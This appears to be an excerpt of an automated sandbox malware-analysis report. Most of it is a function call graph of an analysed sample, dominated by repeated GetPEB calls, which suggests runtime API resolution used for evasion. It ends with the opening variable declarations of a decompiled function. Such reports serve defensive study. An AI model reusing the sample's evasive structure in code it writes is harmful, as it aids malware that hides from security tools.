2f73ee9 4340->5075 5085 2f53271 4340->5085 4341->4344 4344->4154 4345->4340 4347 2f68f0d 4346->4347 4349 2f68f1d 4347->4349 4350 2f5c5d8 GetPEB 4347->4350 4352 2f68f3c 4347->4352 5180 2f548dd 4347->5180 4351 2f60ebc GetPEB 4349->4351 4350->4347 4351->4352 4352->4154 4358 2f5a713 4353->4358 4355 2f5a84e 4357 2f53046 GetPEB 4355->4357 4356 2f5ee62 GetPEB 4356->4358 4359 2f5a84c 4357->4359 4358->4355 4358->4356 4358->4359 4360 2f6e8b6 GetPEB 4358->4360 4361 2f53046 GetPEB 4358->4361 5184 2f51e9b 4358->5184 4359->4154 4360->4358 4361->4358 4364 2f717de 4362->4364 4363 2f6e1f8 GetPEB 4363->4364 4364->4363 4365 2f71f31 4364->4365 4367 2f51a34 GetPEB 4364->4367 4368 2f71f2f 4364->4368 4370 2f6fecb GetPEB 4364->4370 4371 2f5f96f GetPEB 4364->4371 5188 2f5bf5f 4364->5188 4366 2f685ff GetPEB 4365->4366 4366->4368 4367->4364 4368->4132 4370->4364 4371->4364 4380 2f62b33 4372->4380 4375 2f62c60 4376 2f609dd GetPEB 4375->4376 4379 2f62c75 4376->4379 4377 2f6654a GetPEB 4377->4380 4378 2f6e1f8 GetPEB 4378->4380 5206 2f5856e 4379->5206 4380->4375 4380->4377 4380->4378 4382 2f62c5e 4380->4382 4383 2f72d0a GetPEB 4380->4383 4384 2f5a445 GetPEB 4380->4384 4385 2f6fecb GetPEB 4380->4385 5192 2f6dc71 4380->5192 5200 2f51ca1 4380->5200 4382->4132 4383->4380 4384->4380 4385->4380 4387 2f643a8 4386->4387 4390 2f64a52 4387->4390 4392 2f64a50 4387->4392 4393 2f6e1f8 GetPEB 4387->4393 4395 2f72d0a GetPEB 4387->4395 4396 2f6fecb GetPEB 4387->4396 4397 2f6437a GetPEB 4387->4397 4398 2f62c9c 4387->4398 4402 2f62da7 4387->4402 4406 2f70f1e 4387->4406 4410 2f5bea1 4390->4410 4392->4168 4393->4387 4395->4387 4396->4387 4397->4387 4399 2f62cb8 4398->4399 4400 2f731aa GetPEB 4399->4400 4401 2f62cd1 4400->4401 4401->4387 4403 2f62dbd 4402->4403 4404 2f5eb52 GetPEB 4403->4404 4405 2f62e4f 4404->4405 4405->4387 4407 2f70f37 4406->4407 4408 2f5eb52 GetPEB 4407->4408 4409 2f70ff6 4408->4409 4409->4387 4411 2f5beb1 4410->4411 4412 2f5eb52 GetPEB 4411->4412 4413 2f5bf53 4412->4413 4413->4392 4415 2f68bc0 4414->4415 4416 2f5eb52 GetPEB 4415->4416 4417 2f68c6a 4416->4417 4417->4172 4419 2f573a9 4418->4419 4420 2f5eb52 GetPEB 4419->4420 4421 2f5742e 4420->4421 4421->4172 4423 2f5f814 4422->4423 4424 2f5eb52 GetPEB 4423->4424 4425 2f5f892 4424->4425 4425->4181 4427 2f6dbe1 4426->4427 4428 2f5eb52 GetPEB 4427->4428 4429 2f6dc5f 4428->4429 4429->4189 4431 2f6ca35 4430->4431 4432 2f5eb52 GetPEB 4431->4432 4433 2f6cac9 4432->4433 4433->4189 4435 2f71631 4434->4435 4436 2f5eb52 GetPEB 4435->4436 4437 2f716b5 4436->4437 4437->4202 4439 2f72a49 4438->4439 4440 2f5eb52 GetPEB 4439->4440 4441 2f72afe 4440->4441 4441->4202 4443 2f56b9c 4442->4443 4444 2f72b09 GetPEB 4443->4444 4446 2f5706b 4443->4446 4448 2f5c5d8 GetPEB 4443->4448 4507 2f707aa 4443->4507 4512 2f6c9b0 4443->4512 4516 2f746bd 4443->4516 4444->4443 4446->4218 4448->4443 4461 2f657ab 4450->4461 4452 2f72b09 GetPEB 4452->4461 4453 2f66086 4455 2f72b09 GetPEB 4453->4455 4454 2f557b8 GetPEB 4454->4461 4456 2f66084 4455->4456 4456->4218 4459 2f5c5d8 GetPEB 4459->4461 4460 2f6c9b0 GetPEB 4460->4461 4461->4452 4461->4453 4461->4454 4461->4456 4461->4459 4461->4460 4565 2f55026 4461->4565 4569 2f5e7de 4461->4569 4574 2f5fb8e 4461->4574 4470 2f583f1 4462->4470 4463 2f6e1f8 GetPEB 4463->4470 4464 2f5854c 4465 2f72b09 GetPEB 4464->4465 4467 2f5854a 4465->4467 4467->4218 4468 2f731aa GetPEB 4468->4470 4469 2f5c5d8 GetPEB 4469->4470 4470->4463 4470->4464 4470->4467 4470->4468 4470->4469 4471 2f6fecb GetPEB 4470->4471 4581 2f70a64 4470->4581 4471->4470 4484 2f6393f 4472->4484 4473 2f64244 GetPEB 4473->4484 4474 2f5c5d8 GetPEB 4474->4484 4475 2f63d59 4478 2f72b09 GetPEB 4475->4478 4477 2f6c9b0 GetPEB 4477->4484 4489 2f63a00 4478->4489 4479 2f63992 4481 2f64244 GetPEB 4479->4481 4480 2f6e1f8 GetPEB 4480->4484 4483 2f639af 4481->4483 4482 2f731aa GetPEB 4482->4484 4586 2f53325 4483->4586 4484->4473 4484->4474 4484->4475 4484->4477 4484->4479 4484->4480 4484->4482 4488 2f6fecb GetPEB 4484->4488 4484->4489 4590 2f6e1ac 4484->4590 4487 2f6fecb GetPEB 4487->4489 4488->4484 4489->4218 4506 2f66859 4490->4506 4493 2f6e1f8 GetPEB 4493->4506 4494 2f6792e 4626 2f6e358 4494->4626 4498 2f67943 4498->4218 4499 2f72b09 GetPEB 4499->4506 4500 2f6e358 GetPEB 4500->4506 4501 2f6fecb GetPEB 4501->4506 4504 2f73e0e GetPEB 4504->4506 4506->4493 4506->4494 4506->4498 4506->4499 4506->4500 4506->4501 4506->4504 4594 2f5ed66 4506->4594 4598 2f5dda9 4506->4598 4602 2f54bfc 4506->4602 4611 2f710dc 4506->4611 4615 2f5ef0c 4506->4615 4618 2f54a88 4506->4618 4622 2f6c8cf 4506->4622 4511 2f707c6 4507->4511 4510 2f70a10 4510->4443 4511->4510 4522 2f557b8 4511->4522 4537 2f74d53 4511->4537 4513 2f6c9cc 4512->4513 4561 2f5db68 4513->4561 4521 2f746ed 4516->4521 4517 2f72b09 GetPEB 4517->4521 4518 2f5c5d8 GetPEB 4518->4521 4519 2f74d2e 4519->4443 4520 2f711b0 GetPEB 4520->4521 4521->4517 4521->4518 4521->4519 4521->4520 4535 2f557fa 4522->4535 4524 2f6e1f8 GetPEB 4524->4535 4525 2f5c5d8 GetPEB 4525->4535 4527 2f566de 4528 2f5f7fe GetPEB 4527->4528 4530 2f566dc 4528->4530 4530->4511 4531 2f72b09 GetPEB 4531->4535 4532 2f5738a GetPEB 4532->4535 4535->4524 4535->4525 4535->4527 4535->4530 4535->4531 4535->4532 4536 2f6fecb GetPEB 4535->4536 4541 2f6cbe9 4535->4541 4545 2f522c9 4535->4545 4549 2f51bc9 4535->4549 4553 2f5f288 4535->4553 4557 2f712c1 4535->4557 4536->4535 4538 2f74d85 4537->4538 4539 2f5eb52 GetPEB 4538->4539 4540 2f74e23 4539->4540 4540->4511 4542 2f6cc0e 4541->4542 4543 2f5eb52 GetPEB 4542->4543 4544 2f6cc8d 4543->4544 4544->4535 4546 2f522e8 4545->4546 4547 2f5eb52 GetPEB 4546->4547 4548 2f52377 4547->4548 4548->4535 4550 2f51bfb 4549->4550 4551 2f5eb52 GetPEB 4550->4551 4552 2f51c85 4551->4552 4552->4535 4554 2f5f2b2 4553->4554 4555 2f5eb52 GetPEB 4554->4555 4556 2f5f350 4555->4556 4556->4535 4558 2f712da 4557->4558 4559 2f5eb52 GetPEB 4558->4559 4560 2f71380 4559->4560 4560->4535 4562 2f5db84 4561->4562 4563 2f5eb52 GetPEB 4562->4563 4564 2f5dc0b 4563->4564 4564->4443 4566 2f5503c 4565->4566 4567 2f6c9b0 GetPEB 4566->4567 4568 2f550e1 4567->4568 4568->4461 4573 2f5e806 4569->4573 4570 2f6cad5 GetPEB 4570->4573 4571 2f5c5d8 GetPEB 4571->4573 4572 2f5eb40 4572->4461 4573->4570 4573->4571 4573->4572 4575 2f5fbad 4574->4575 4576 2f5c5d8 GetPEB 4575->4576 4577 2f52194 GetPEB 4575->4577 4578 2f60084 4575->4578 4579 2f60086 4575->4579 4576->4575 4577->4575 4578->4461 4580 2f72b09 GetPEB 4579->4580 4580->4578 4582 2f70a7e 4581->4582 4583 2f5c5d8 GetPEB 4582->4583 4584 2f6c4f8 GetPEB 4582->4584 4585 2f70da7 4582->4585 4583->4582 4584->4582 4585->4470 4587 2f5333e 4586->4587 4588 2f731aa GetPEB 4587->4588 4589 2f5335a 4588->4589 4589->4487 4591 2f6e1ce 4590->4591 4592 2f731aa GetPEB 4591->4592 4593 2f6e1f0 4592->4593 4593->4484 4595 2f5eda1 4594->4595 4596 2f5eb52 GetPEB 4595->4596 4597 2f5ee49 4596->4597 4597->4506 4599 2f5ddcb 4598->4599 4600 2f5eb52 GetPEB 4599->4600 4601 2f5de63 4600->4601 4601->4506 4604 2f54ec7 4602->4604 4605 2f54fee 4604->4605 4608 2f5c5d8 GetPEB 4604->4608 4609 2f6c9b0 GetPEB 4604->4609 4610 2f72b09 GetPEB 4604->4610 4630 2f69c65 4604->4630 4606 2f55009 4605->4606 4607 2f72b09 GetPEB 4605->4607 4606->4506 4607->4606 4608->4604 4609->4604 4610->4604 4612 2f71100 4611->4612 4613 2f5eb52 GetPEB 4612->4613 4614 2f7119a 4613->4614 4614->4506 4634 2f660b8 4615->4634 4619 2f54abc 4618->4619 4620 2f5eb52 GetPEB 4619->4620 4621 2f54b44 4620->4621 4621->4506 4623 2f6c8f4 4622->4623 4624 2f5eb52 GetPEB 4623->4624 4625 2f6c99d 4624->4625 4625->4506 4627 2f6e36b 4626->4627 4628 2f5eb52 GetPEB 4627->4628 4629 2f6e3fa 4628->4629 4629->4498 4631 2f69c85 4630->4631 4632 2f5eb52 GetPEB 4631->4632 4633 2f69d29 4632->4633 4633->4604 4635 2f660de 4634->4635 4636 2f5eb52 GetPEB 4635->4636 4637 2f5efd1 4636->4637 4637->4506 4649 2f51f38 4638->4649 4642 2f60ade 4641->4642 4675 2f6f790 4642->4675 4645 2f60c1f 4645->4226 4648 2f71538 GetPEB 4648->4645 4651 2f51f57 4649->4651 4655 2f520da 4651->4655 4656 2f520cc 4651->4656 4658 2f57603 4651->4658 4661 2f706ec 4651->4661 4665 2f5bd23 4651->4665 4669 2f5e5c0 4651->4669 4655->4226 4657 2f71538 GetPEB 4656->4657 4657->4655 4659 2f5eb52 GetPEB 4658->4659 4660 2f576d3 4659->4660 4660->4651 4662 2f70702 4661->4662 4663 2f5eb52 GetPEB 4662->4663 4664 2f7079c 4663->4664 4664->4651 4666 2f5bd40 4665->4666 4667 2f5eb52 GetPEB 4666->4667 4668 2f5bdeb 4667->4668 4668->4651 4672 2f5556b 4669->4672 4673 2f5eb52 GetPEB 4672->4673 4674 2f555f6 4673->4674 4674->4651 4676 2f5eb52 GetPEB 4675->4676 4677 2f60bf0 4676->4677 4677->4645 4678 2f5daaa 4677->4678 4679 2f5dac8 4678->4679 4680 2f5eb52 GetPEB 4679->4680 4681 2f5db55 4680->4681 4681->4648 4683 2f6e10e 4682->4683 4684 2f5eb52 GetPEB 4683->4684 4685 2f6e19c 4684->4685 4685->4238 4687 2f68c96 4686->4687 4688 2f5eb52 GetPEB 4687->4688 4689 2f68d2f 4688->4689 4689->4238 4694 2f6f859 4690->4694 4691 2f6a1c0 GetPEB 4691->4694 4692 2f6fb47 4692->4238 4693 2f5c5d8 GetPEB 4693->4694 4694->4691 4694->4692 4694->4693 4695 2f6fb19 4694->4695 4701 2f6a1c0 4695->4701 4698 2f554c9 4697->4698 4699 2f5eb52 GetPEB 4698->4699 4700 2f5555f 4699->4700 4700->4235 4702 2f6a1f0 4701->4702 4703 2f5eb52 GetPEB 4702->4703 4704 2f6a28c 4703->4704 4704->4692 4706 2f7451c 4705->4706 4707 2f5eb52 GetPEB 4706->4707 4708 2f745b7 4707->4708 4708->4244 4710 2f5eb52 GetPEB 4709->4710 4711 2f5dc97 4710->4711 4711->4264 4713 2f744d8 4712->4713 4714 2f731aa GetPEB 4713->4714 4715 2f744f7 4714->4715 4715->4264 4717 2f66564 4716->4717 4718 2f6fe2a GetPEB 4717->4718 4719 2f66749 4718->4719 4720 2f6fe2a GetPEB 4719->4720 4721 2f66761 4720->4721 4722 2f6fe2a GetPEB 4721->4722 4723 2f66774 4722->4723 4730 2f5e204 4723->4730 4726 2f5e204 GetPEB 4727 2f6679e 4726->4727 4734 2f5e4f8 4727->4734 4731 2f5e217 4730->4731 4732 2f5eb52 GetPEB 4731->4732 4733 2f5e2ae 4732->4733 4733->4726 4735 2f5e511 4734->4735 4736 2f5eb52 GetPEB 4735->4736 4737 2f5e5b5 4736->4737 4737->4258 4739 2f553e3 4738->4739 4740 2f5eb52 GetPEB 4739->4740 4741 2f5546b 4740->4741 4741->4154 4743 2f600d8 4742->4743 4744 2f5eb52 GetPEB 4743->4744 4745 2f60170 4744->4745 4745->4275 4747 2f62d03 4746->4747 4748 2f5eb52 GetPEB 4747->4748 4749 2f62d8e 4748->4749 4749->4275 4751 2f52e23 4750->4751 4752 2f5eb52 GetPEB 4751->4752 4753 2f52ea5 4752->4753 4753->4275 4755 2f5f997 4754->4755 4756 2f731aa GetPEB 4755->4756 4757 2f5f9b9 4756->4757 4757->4275 4759 2f5305c 4758->4759 4760 2f5eb52 GetPEB 4759->4760 4761 2f530db 4760->4761 4761->4281 4764 2f6b27f 4762->4764 4763 2f6bb76 4765 2f72b09 GetPEB 4763->4765 4764->4763 4766 2f6bb89 4764->4766 4771 2f72b09 GetPEB 4764->4771 4772 2f5dc1b GetPEB 4764->4772 4773 2f5c5d8 GetPEB 4764->4773 4774 2f53046 GetPEB 4764->4774 4783 2f5ee62 4764->4783 4787 2f5fa95 4764->4787 4791 2f6fd4e 4764->4791 4795 2f5c3a7 4764->4795 4765->4766 4766->4281 4771->4764 4772->4764 4773->4764 4774->4764 4776 2f67c9b 4775->4776 4777 2f5eb52 GetPEB 4776->4777 4778 2f67d35 4777->4778 4778->4281 4780 2f6e8d0 4779->4780 4781 2f5eb52 GetPEB 4780->4781 4782 2f6e946 4781->4782 4782->4281 4784 2f5ee81 4783->4784 4785 2f5eb52 GetPEB 4784->4785 4786 2f5eefb 4785->4786 4786->4764 4788 2f5fad4 4787->4788 4789 2f5eb52 GetPEB 4788->4789 4790 2f5fb70 4789->4790 4790->4764 4792 2f6fd79 4791->4792 4793 2f5eb52 GetPEB 4792->4793 4794 2f6fe12 4793->4794 4794->4764 4796 2f5c3c9 4795->4796 4797 2f5eb52 GetPEB 4796->4797 4798 2f5c463 4797->4798 4798->4764 4805 2f69e1d 4799->4805 4800 2f64244 GetPEB 4800->4805 4803 2f6a1b5 4803->4298 4805->4800 4805->4803 4806 2f6fecb GetPEB 4805->4806 4807 2f696c2 4805->4807 4811 2f65515 4805->4811 4816 2f70a1a 4805->4816 4806->4805 4808 2f696db 4807->4808 4809 2f5eb52 GetPEB 4808->4809 4810 2f69765 4809->4810 4810->4805 4820 2f60de5 4811->4820 4815 2f65670 4815->4805 4817 2f70a3f 4816->4817 4818 2f731aa GetPEB 4817->4818 4819 2f70a5c 4818->4819 4819->4805 4821 2f60dfe 4820->4821 4822 2f5eb52 GetPEB 4821->4822 4823 2f60eae 4822->4823 4823->4815 4824 2f7138b 4823->4824 4825 2f713b8 4824->4825 4826 2f5eb52 GetPEB 4825->4826 4827 2f71475 4826->4827 4827->4815 4834 2f608fe 4828->4834 4829 2f70db1 GetPEB 4829->4834 4830 2f609b5 4830->4309 4831 2f609b7 4832 2f5e204 GetPEB 4831->4832 4832->4830 4833 2f600c5 GetPEB 4833->4834 4834->4829 4834->4830 4834->4831 4834->4833 4836 2f67a2c 4835->4836 4837 2f6e1f8 GetPEB 4836->4837 4838 2f67bfe 4837->4838 4839 2f62c9c GetPEB 4838->4839 4840 2f67c1b 4839->4840 4841 2f6fecb GetPEB 4840->4841 4842 2f67c2e 4841->4842 4843 2f5d061 GetPEB 4842->4843 4844 2f67c45 4843->4844 4844->4318 4846 2f6b1af 4845->4846 4847 2f5eb52 GetPEB 4846->4847 4848 2f6b248 4847->4848 4848->4154 4866 2f683d6 4849->4866 4850 2f6851b 4851 2f51a34 GetPEB 4850->4851 4853 2f6854b 4851->4853 4852 2f70db1 GetPEB 4852->4866 4854 2f6e1f8 GetPEB 4853->4854 4855 2f68565 4854->4855 4857 2f72d0a GetPEB 4855->4857 4856 2f609dd GetPEB 4856->4866 4858 2f685a6 4857->4858 4860 2f6fecb GetPEB 4858->4860 4862 2f685c6 4860->4862 4861 2f6e1f8 GetPEB 4861->4866 4863 2f685ff GetPEB 4862->4863 4865 2f68516 4863->4865 4864 2f72d0a GetPEB 4864->4866 4865->4326 4866->4850 4866->4852 4866->4856 4866->4861 4866->4864 4866->4865 4867 2f6fecb GetPEB 4866->4867 4966 2f5baa9 4866->4966 4970 2f5bfbe 4866->4970 4867->4866 4880 2f704c6 4869->4880 4870 2f705e9 4872 2f685ff GetPEB 4870->4872 4871 2f705e7 4871->4326 4872->4871 4873 2f70db1 GetPEB 4873->4880 4874 2f609dd GetPEB 4874->4880 4875 2f5baa9 GetPEB 4875->4880 4876 2f6e1f8 GetPEB 4876->4880 4877 2f72d0a GetPEB 4877->4880 4878 2f6fecb GetPEB 4878->4880 4879 2f5bfbe GetPEB 4879->4880 4880->4870 4880->4871 4880->4873 4880->4874 4880->4875 4880->4876 4880->4877 4880->4878 4880->4879 4882 2f5ba26 4881->4882 4883 2f5ba9c 4882->4883 4884 2f72b09 GetPEB 4882->4884 4885 2f71028 GetPEB 4882->4885 4887 2f71538 GetPEB 4882->4887 4981 2f5f0e9 4882->4981 4883->4326 4884->4882 4885->4882 4887->4882 4989 2f71f6d 4888->4989 4890 2f72b09 GetPEB 4907 2f5b3e7 4890->4907 4891 2f70a64 GetPEB 4891->4907 4893 2f6e1f8 GetPEB 4893->4907 4894 2f51a34 GetPEB 4894->4907 4895 2f685ff GetPEB 4895->4907 4896 2f5b7fd 4900 2f71538 GetPEB 4896->4900 4897 2f70db1 GetPEB 4897->4907 4898 2f5b7fb 4898->4326 4899 2f744ad GetPEB 4899->4907 4900->4898 4901 2f609dd GetPEB 4901->4907 4902 2f600c5 GetPEB 4902->4907 4903 2f6fecb GetPEB 4903->4907 4904 2f5baa9 GetPEB 4904->4907 4906 2f72d0a GetPEB 4906->4907 4907->4890 4907->4891 4907->4893 4907->4894 4907->4895 4907->4896 4907->4897 4907->4898 4907->4899 4907->4901 4907->4902 4907->4903 4907->4904 4907->4906 4908 2f5bfbe GetPEB 4907->4908 4992 2f5f726 4907->4992 4996 2f6d8db 4907->4996 4908->4907 4915 2f6cfe9 4909->4915 4910 2f6d0f1 4910->4326 4911 2f6d0f3 4913 2f5f0e9 GetPEB 4911->4913 4913->4910 4915->4910 4915->4911 5006 2f60ebc 4915->5006 5010 2f73263 4915->5010 5018 2f5e2bd 4915->5018 4935 2f52ad8 4917->4935 4918 2f6c387 GetPEB 4918->4935 4919 2f52d78 4920 2f685ff GetPEB 4919->4920 4923 2f52da8 4920->4923 4921 2f52d64 4926 2f71538 GetPEB 4921->4926 4925 2f52d62 4923->4925 4927 2f71538 GetPEB 4923->4927 4925->4326 4926->4925 4927->4921 4928 2f70db1 GetPEB 4928->4935 4930 2f609dd GetPEB 4930->4935 4931 2f71538 GetPEB 4931->4935 4932 2f5baa9 GetPEB 4932->4935 4933 2f6e1f8 GetPEB 4933->4935 4934 2f72d0a GetPEB 4934->4935 4935->4918 4935->4919 4935->4921 4935->4925 4935->4928 4935->4930 4935->4931 4935->4932 4935->4933 4935->4934 4936 2f6fecb GetPEB 4935->4936 4937 2f5bfbe GetPEB 4935->4937 5031 2f69774 4935->5031 5039 2f6017b 4935->5039 5048 2f6bc6b 4935->5048 4936->4935 4937->4935 4955 2f6aadf 4938->4955 4939 2f6ac24 4940 2f51a34 GetPEB 4939->4940 4943 2f6ac51 4940->4943 4941 2f70db1 GetPEB 4941->4955 4942 2f6ac1f 4942->4326 4944 2f6e1f8 GetPEB 4943->4944 4946 2f6ac74 4944->4946 4945 2f609dd GetPEB 4945->4955 4947 2f72d0a GetPEB 4946->4947 4949 2f6acaf 4947->4949 4948 2f5baa9 GetPEB 4948->4955 4950 2f6fecb GetPEB 4949->4950 4951 2f6accf 4950->4951 4953 2f685ff GetPEB 4951->4953 4952 2f6e1f8 GetPEB 4952->4955 4953->4942 4954 2f72d0a GetPEB 4954->4955 4955->4939 4955->4941 4955->4942 4955->4945 4955->4948 4955->4952 4955->4954 4956 2f6fecb GetPEB 4955->4956 4957 2f5bfbe GetPEB 4955->4957 4956->4955 4957->4955 4959 2f7307f 4958->4959 4960 2f7318c 4959->4960 4961 2f7318a 4959->4961 4962 2f73263 GetPEB 4959->4962 4964 2f60ebc GetPEB 4959->4964 4965 2f5e2bd GetPEB 4959->4965 4963 2f5f0e9 GetPEB 4960->4963 4961->4326 4962->4959 4963->4961 4964->4959 4965->4959 4967 2f5bac2 4966->4967 4968 2f5dc1b GetPEB 4967->4968 4969 2f5bb97 4968->4969 4969->4866 4971 2f5bfd7 4970->4971 4972 2f5c273 4971->4972 4973 2f745ca GetPEB 4971->4973 4976 2f5c271 4971->4976 4977 2f6c41a 4971->4977 4974 2f71538 GetPEB 4972->4974 4973->4971 4974->4976 4976->4866 4978 2f6c440 4977->4978 4979 2f5eb52 GetPEB 4978->4979 4980 2f6c4e1 4979->4980 4980->4971 4982 2f5f0ff 4981->4982 4985 2f5f8a9 4982->4985 4986 2f5f8c6 4985->4986 4987 2f5eb52 GetPEB 4986->4987 4988 2f5f1c3 4987->4988 4988->4882 4990 2f5eb52 GetPEB 4989->4990 4991 2f72000 4990->4991 4991->4907 4993 2f5f758 4992->4993 4994 2f5eb52 GetPEB 4993->4994 4995 2f5f7dc 4994->4995 4995->4907 5001 2f6d8fb 4996->5001 4997 2f5c5d8 GetPEB 4997->5001 4998 2f6db95 5002 2f6cad5 4998->5002 4999 2f6db93 4999->4907 5001->4997 5001->4998 5001->4999 5003 2f6caef 5002->5003 5004 2f6c9b0 GetPEB 5003->5004 5005 2f6cbda 5004->5005 5005->4999 5007 2f60ede 5006->5007 5008 2f5eb52 GetPEB 5007->5008 5009 2f60f72 5008->5009 5009->4915 5011 2f7327e 5010->5011 5012 2f73556 5011->5012 5023 2f662c7 5011->5023 5012->4915 5015 2f6c9b0 GetPEB 5017 2f7350d 5015->5017 5016 2f6c9b0 GetPEB 5016->5017 5017->5012 5017->5016 5021 2f5e2d8 5018->5021 5019 2f5e3f5 5019->4915 5020 2f5483c GetPEB 5020->5021 5021->5019 5021->5020 5027 2f51afd 5021->5027 5024 2f662eb 5023->5024 5025 2f5eb52 GetPEB 5024->5025 5026 2f66383 5025->5026 5026->5012 5026->5015 5028 2f51b10 5027->5028 5029 2f5eb52 GetPEB 5028->5029 5030 2f51bba 5029->5030 5030->5021 5035 2f69797 5031->5035 5032 2f69967 5032->4935 5034 2f6bc6b GetPEB 5034->5035 5035->5032 5035->5034 5037 2f69956 5035->5037 5051 2f572c4 5035->5051 5055 2f5f9c1 5035->5055 5038 2f71538 GetPEB 5037->5038 5038->5032 5040 2f601c2 5039->5040 5043 2f606f1 5040->5043 5044 2f6fe2a GetPEB 5040->5044 5045 2f6e1f8 GetPEB 5040->5045 5047 2f6fecb GetPEB 5040->5047 5059 2f5473d 5040->5059 5063 2f64178 5040->5063 5067 2f67952 5040->5067 5043->4935 5044->5040 5045->5040 5047->5040 5049 2f5eb52 GetPEB 5048->5049 5050 2f6bd0a 5049->5050 5050->4935 5052 2f572e0 5051->5052 5053 2f5eb52 GetPEB 5052->5053 5054 2f5737c 5053->5054 5054->5035 5056 2f5f9eb 5055->5056 5057 2f5eb52 GetPEB 5056->5057 5058 2f5fa7c 5057->5058 5058->5035 5060 2f54786 5059->5060 5061 2f5eb52 GetPEB 5060->5061 5062 2f5481a 5061->5062 5062->5040 5064 2f64194 5063->5064 5065 2f5eb52 GetPEB 5064->5065 5066 2f64233 5065->5066 5066->5040 5068 2f67965 5067->5068 5069 2f5eb52 GetPEB 5068->5069 5070 2f67a04 5069->5070 5070->5040 5072 2f5dd16 5071->5072 5073 2f5dd30 5071->5073 5072->5073 5074 2f72b09 GetPEB 5072->5074 5073->4340 5074->5072 5080 2f741ee 5075->5080 5076 2f6e1f8 GetPEB 5076->5080 5077 2f743c9 5077->4340 5079 2f5f96f GetPEB 5079->5080 5080->5076 5080->5077 5080->5079 5081 2f743b4 5080->5081 5083 2f6fecb GetPEB 5080->5083 5084 2f5c5d8 GetPEB 5080->5084 5089 2f63d85 5080->5089 5082 2f72b09 GetPEB 5081->5082 5082->5077 5083->5080 5084->5080 5086 2f5328d 5085->5086 5093 2f57442 5086->5093 5090 2f63d9c 5089->5090 5091 2f5c5d8 GetPEB 5090->5091 5092 2f63e5b 5091->5092 5092->5080 5101 2f57462 5093->5101 5094 2f5c5d8 GetPEB 5094->5101 5097 2f57576 5100 2f72b09 GetPEB 5097->5100 5098 2f5331d 5098->4340 5100->5098 5101->5094 5101->5097 5101->5098 5102 2f68fae 5101->5102 5111 2f60d04 5101->5111 5116 2f60f86 5101->5116 5105 2f694f3 5102->5105 5103 2f6969b 5104 2f5f7fe GetPEB 5103->5104 5106 2f69699 5104->5106 5105->5103 5105->5106 5107 2f6e1f8 GetPEB 5105->5107 5109 2f5738a GetPEB 5105->5109 5110 2f6fecb GetPEB 5105->5110 5133 2f5bc32 5105->5133 5106->5101 5107->5105 5109->5105 5110->5105 5137 2f52ebf 5111->5137 5114 2f72b09 GetPEB 5115 2f60dde 5114->5115 5115->5101 5119 2f61c7c 5116->5119 5117 2f6c237 GetPEB 5117->5119 5119->5117 5120 2f5bc32 GetPEB 5119->5120 5121 2f52ebf GetPEB 5119->5121 5122 2f6e1f8 GetPEB 5119->5122 5124 2f62118 5119->5124 5128 2f5738a GetPEB 5119->5128 5129 2f62116 5119->5129 5131 2f6fecb GetPEB 5119->5131 5132 2f6c9b0 GetPEB 5119->5132 5141 2f53431 5119->5141 5156 2f716c0 5119->5156 5160 2f6c2cf 5119->5160 5164 2f743e6 5119->5164 5168 2f551e7 5119->5168 5120->5119 5121->5119 5122->5119 5126 2f5f7fe GetPEB 5124->5126 5126->5129 5128->5119 5129->5101 5131->5119 5132->5119 5134 2f5bc62 5133->5134 5135 2f5eb52 GetPEB 5134->5135 5136 2f5bd08 5135->5136 5136->5105 5138 2f52ed3 5137->5138 5139 2f5eb52 GetPEB 5138->5139 5140 2f52f74 5139->5140 5140->5114 5148 2f54267 5141->5148 5142 2f72b09 GetPEB 5142->5148 5143 2f6e1f8 GetPEB 5143->5148 5144 2f54738 5144->5144 5145 2f542a0 5149 2f5f7fe GetPEB 5145->5149 5146 2f5f288 GetPEB 5146->5148 5147 2f5c5d8 GetPEB 5147->5148 5148->5142 5148->5143 5148->5144 5148->5145 5148->5146 5148->5147 5150 2f600c5 GetPEB 5148->5150 5153 2f5738a GetPEB 5148->5153 5155 2f6fecb GetPEB 5148->5155 5172 2f550e8 5148->5172 5176 2f549a4 5148->5176 5152 2f542be 5149->5152 5150->5148 5152->5119 5153->5148 5155->5148 5157 2f716f5 5156->5157 5158 2f5eb52 GetPEB 5157->5158 5159 2f717a1 5158->5159 5159->5119 5161 2f6c2e5 5160->5161 5162 2f5eb52 GetPEB 5161->5162 5163 2f6c370 5162->5163 5163->5119 5165 2f74405 5164->5165 5166 2f5eb52 GetPEB 5165->5166 5167 2f74498 5166->5167 5167->5119 5169 2f55206 5168->5169 5170 2f5eb52 GetPEB 5169->5170 5171 2f552a5 5170->5171 5171->5119 5173 2f55123 5172->5173 5174 2f5eb52 GetPEB 5173->5174 5175 2f551c6 5174->5175 5175->5148 5177 2f549d5 5176->5177 5178 2f5eb52 GetPEB 5177->5178 5179 2f54a6b 5178->5179 5179->5148 5181 2f548f4 5180->5181 5182 2f5eb52 GetPEB 5181->5182 5183 2f54996 5182->5183 5183->4347 5185 2f51eb4 5184->5185 5186 2f5eb52 GetPEB 5185->5186 5187 2f51f2d 5186->5187 5187->4358 5189 2f5bf93 5188->5189 5190 2f731aa GetPEB 5189->5190 5191 2f5bfb6 5190->5191 5191->4364 5196 2f6dfa2 5192->5196 5193 2f553d0 GetPEB 5193->5196 5195 2f6e1f8 GetPEB 5195->5196 5196->5193 5196->5195 5197 2f6e0e6 5196->5197 5198 2f52dea GetPEB 5196->5198 5199 2f6fecb GetPEB 5196->5199 5210 2f7298d 5196->5210 5197->4380 5198->5196 5199->5196 5202 2f51cc0 5200->5202 5203 2f6fe2a GetPEB 5202->5203 5205 2f51e90 5202->5205 5214 2f52f80 5202->5214 5218 2f606fe 5202->5218 5203->5202 5205->4380 5207 2f58581 5206->5207 5208 2f5eb52 GetPEB 5207->5208 5209 2f5862b 5208->5209 5209->4382 5211 2f729a3 5210->5211 5212 2f5eb52 GetPEB 5211->5212 5213 2f72a27 5212->5213 5213->5196 5215 2f52f9f 5214->5215 5216 2f5eb52 GetPEB 5215->5216 5217 2f53039 5216->5217 5217->5202 5219 2f6071c 5218->5219 5220 2f5eb52 GetPEB 5219->5220 5221 2f607dc 5220->5221 5221->5202

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E02F6EFDD() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				char _v1560;
                                                                                                                                                                            				signed int _v1564;
                                                                                                                                                                            				signed int _v1568;
                                                                                                                                                                            				signed int _v1572;
                                                                                                                                                                            				signed int _v1576;
                                                                                                                                                                            				signed int _v1580;
                                                                                                                                                                            				signed int _v1584;
